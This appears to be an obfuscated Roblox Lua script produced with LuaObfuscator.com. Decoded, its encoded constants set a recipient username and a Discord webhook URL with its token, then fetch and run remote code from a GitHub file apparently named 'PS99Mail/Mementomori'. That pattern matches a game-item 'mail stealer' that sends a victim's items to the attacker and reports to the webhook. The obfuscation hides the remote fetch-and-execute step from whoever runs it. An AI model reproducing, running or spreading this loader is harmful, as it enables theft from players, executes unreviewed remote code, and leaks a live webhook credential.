--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v95=0;local v96;while true do if (v95==1) then return v96;end if (v95==0) then v96=v5(v83,v19);v19=nil;v95=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(((2 + 3) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((98 + 522) -(555 + 64)))) + (932 -(857 + (951 -(282 + 595)))))) ;return v84-(v84%1) ;else local v85=2^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and 1) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1637 -(1523 + 114) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * 256) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + (1161 -(32 + 85)))) ;v35=4 -(3 + 0) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 -0 ,370 -(87 + 263) ) * ((182 -(67 + 20 + 93))^(24 + (13 -5)))) + v42 ;local v46=v20(v43,51 -(30 + 0) ,23 + 8 );local v47=((v20(v43,823 -(368 + 423) )==((9 -6) -2)) and  -(953 -(802 + 150))) or (2 -1) ;if (v46==((18 -(10 + 8)) -0)) then if (v45==((0 -0) + 0)) then return v47 * ((1439 -(416 + 26)) -(915 + 82)) ;else v46=1;v44=0 -0 ;end elseif (v46==(5796 -3749)) then return ((v45==0) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -(1 + 1))^(113 -61)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v66=1487 -(998 + 488) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==2) then v56=nil;v57=nil;v51=3;end if (v51==(399 -(115 + 281))) then v58=nil;v59=nil;v51=4;end if (v51~=(2 -1)) then else v54=nil;v55=nil;v51=2 + 0 ;end if (v51~=4) then else while true do if (v52~=0) then else local v93=0 -0 ;while true do if (v93~=0) then else v53=0 -0 ;v54=nil;v93=868 -(550 + 317) ;end if (v93==1) then v52=1;break;end end end if (v52==(3 -0)) then v59=nil;while true do if (v53==2) then local v102=0;local v103;while true do if (v102~=0) then else v103=0 -0 ;while true do if (v103==(2 -1)) then return v57;end if (v103~=0) then else for v165=1,v23() do local v166=0;local v167;local v168;while true do if (v166~=0) then else local v171=0;while true do if ((286 -(134 + 151))==v171) then v166=1666 -(970 + 695) ;break;end if (0~=v171) then else v167=0;v168=nil;v171=1 -0 ;end end end if ((1991 -(582 + 1408))==v166) then while true do if (v167~=(0 -0)) then else v168=v21();if (v20(v168,1,1)==0) then local v175=0;local v176;local v177;local v178;local v179;while true do if (v175~=2) then else while true do if (v176~=(1 -0)) then else local v185=0;while true do if (v185~=(3 -2)) then else v176=1826 -(1195 + 629) ;break;end if (0~=v185) then else v179={v22(),v22(),nil,nil};if (v177==0) then local v193=0;local v194;while true do if (v193==0) then v194=780 -(162 + 618) ;while true do if (v194~=(0 + 0)) then else v179[2 + 1 ]=v22();v179[8 -4 ]=v22();break;end end break;end end elseif (v177==1) then v179[4 -1 ]=v23();elseif (v177==(1 + 1)) then v179[1639 -(1373 + 263) ]=v23() -((1002 -(451 + 549))^16) ;elseif (v177==(1 + 2)) then local v204=0;local v205;while true do if (v204~=(0 -0)) then else v205=0;while true do if (v205~=(0 -0)) then else v179[1387 -(746 + 638) ]=v23() -((1 + 1)^16) ;v179[5 -1 ]=v22();break;end end break;end end end v185=1;end end end if (v176~=(343 -(218 + 123))) then else local v186=1581 -(1535 + 46) ;while true do if (v186~=(1 + 0)) then else v176=1 + 2 ;break;end if (v186~=0) then else if (v20(v178,561 -(306 + 254) ,1 + 0 )==1) then v179[3 -1 ]=v59[v179[1469 -(899 + 568) ]];end if (v20(v178,2,2 + 0 )~=(2 -1)) then else v179[3]=v59[v179[606 -(268 + 335) ]];end v186=291 -(60 + 230) ;end end end if (v176==3) then if (v20(v178,575 -(426 + 146) ,1 + 2 )==(1457 -(282 + 1174))) then v179[815 -(569 + 242) ]=v59[v179[4]];end v54[v165]=v179;break;end if (v176==0) then local v188=0;while true do if (v188==0) then v177=v20(v168,2,8 -5 );v178=v20(v168,1 + 3 ,1030 -(706 + 318) );v188=1252 -(721 + 530) ;end if (1~=v188) then else v176=1272 -(945 + 326) ;break;end end end end break;end if (v175~=(2 -1)) then else local v184=0;while true do if (v184==1) then v175=2 + 0 ;break;end if (0==v184) then v178=nil;v179=nil;v184=1;end end end if (v175~=(700 -(271 + 429))) then else v176=0;v177=nil;v175=1;end end end break;end end break;end end end for v169=1 + 0 ,v23() do v55[v169-1 ]=v28();end v103=1501 -(1408 + 92) ;end end break;end end end if (v53==0) then v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1;end if (v53~=1) then else local v104=0;while true do if (v104==(1171 -(418 + 753))) then v58=v23();v59={};v104=1 + 0 ;end if (v104~=1) then else for v128=1 + 0 ,v58 do local v129=0 + 0 ;local v130;local v131;local v132;local v133;local v134;while true do if (v129~=(1 + 1)) then else v134=nil;while true do if (v130~=(530 -(406 + 123))) then else local v172=1769 -(1749 + 20) ;while true do if (v172==1) then v130=1 + 1 ;break;end if (v172~=0) then else v133=nil;v134=nil;v172=1;end end end if (v130==0) then local v173=0;while true do if (v173~=1) then else v130=1;break;end if (0==v173) then v131=0;v132=nil;v173=1;end end end if (v130~=(1324 -(1249 + 73))) then else while true do if (v131==0) then local v174=0 + 0 ;while true do if (1~=v174) then else v131=1146 -(466 + 679) ;break;end if ((0 -0)==v174) then local v180=0 -0 ;while true do if ((1900 -(106 + 1794))~=v180) then else v132=0 + 0 ;v133=nil;v180=1;end if (v180==(1 + 0)) then v174=2 -1 ;break;end end end end end if (v131==(2 -1)) then v134=nil;while true do if (v132~=1) then else if (v133==(115 -(4 + 110))) then v134=v21()~=(584 -(57 + 527)) ;elseif (v133==2) then v134=v24();elseif (v133~=(1430 -(41 + 1386))) then else v134=v25();end v59[v128]=v134;break;end if (v132==0) then local v182=103 -(17 + 86) ;local v183;while true do if (v182~=(0 + 0)) then else v183=0 -0 ;while true do if (v183==1) then v132=2 -1 ;break;end if (v183~=0) then else local v189=166 -(122 + 44) ;local v190;while true do if (0~=v189) then else v190=0 -0 ;while true do if ((3 -2)==v190) then v183=1;break;end if (v190==0) then local v200=0 + 0 ;while true do if (v200==(1 + 0)) then v190=1 -0 ;break;end if (v200==(65 -(30 + 35))) then v133=v21();v134=nil;v200=1 + 0 ;end end end end break;end end end end break;end end end end break;end end break;end end break;end if (v129==0) then v130=1257 -(1043 + 214) ;v131=nil;v129=3 -2 ;end if (v129==1) then v132=nil;v133=nil;v129=1214 -(323 + 889) ;end end end v57[7 -4 ]=v21();v104=582 -(361 + 219) ;end if (v104==2) then v53=322 -(53 + 267) ;break;end end end end break;end if (v52~=(1 + 0)) then else v55=nil;v56=nil;v52=2;end if (v52==(415 -(15 + 398))) then local v94=0;while true do if (0~=v94) then else v57=nil;v58=nil;v94=1;end if (v94==1) then v52=3;break;end end end end break;end if (v51~=0) then else v52=0;v53=nil;v51=983 -(18 + 964) ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81==0) then v78[v80[2]]=v80[3]~=0 ;elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end elseif (v81<=2) then v78[v80[2]]();elseif (v81>3) then v78[v80[2]]=v80[3];else local v110=v80[2];local v111=v78[v80[3]];v78[v110 + 1 ]=v111;v78[v110]=v111[v80[4]];end elseif (v81<=6) then if (v81>5) then v62[v80[3]]=v78[v80[2]];else local v100=0;local v101;while true do if (0==v100) then v101=v80[2];v78[v101]=v78[v101](v13(v78,v101 + 1 ,v73));break;end end end elseif (v81<=7) then do return;end elseif (v81>8) then local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v124=v115,v73 do v118=v118 + 1 ;v78[v124]=v116[v118];end else local v119=0;local v120;local v121;while true do if (v119==3) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v119=4;end if (4==v119) then v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v119=5;end if (5==v119) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v119=6;end if (v119==6) then v72=v72 + 1 ;v80=v68[v72];v121=v80[2];v120=v78[v80[3]];v119=7;end if (v119==2) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v119=3;end if (v119==1) then v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v119=2;end if (v119==8) then v78[v80[2]]=v80[3];break;end if (v119==0) then v120=nil;v121=nil;v78[v80[2]]=v80[3];v72=v72 + 1 ;v119=1;end if (v119==7) then v78[v121 + 1 ]=v120;v78[v121]=v120[v80[4]];v72=v72 + 1 ;v80=v68[v72];v119=8;end end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365726E616D65030E3O004775692O6C6F64696E6F3132333403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O30373330353034333239312O363O382F706B6959494E613539444E6677623370757651366C6A62456F5842534E76515F786531333244735969717232523178465646316D6C796D356E594E37643964565F326957030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000E3O0012083O00023O00124O00013O00124O00043O00124O00038O00013O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0009000100034O00055O00022O00023O000100012O00073O00017O00",v9(),...);
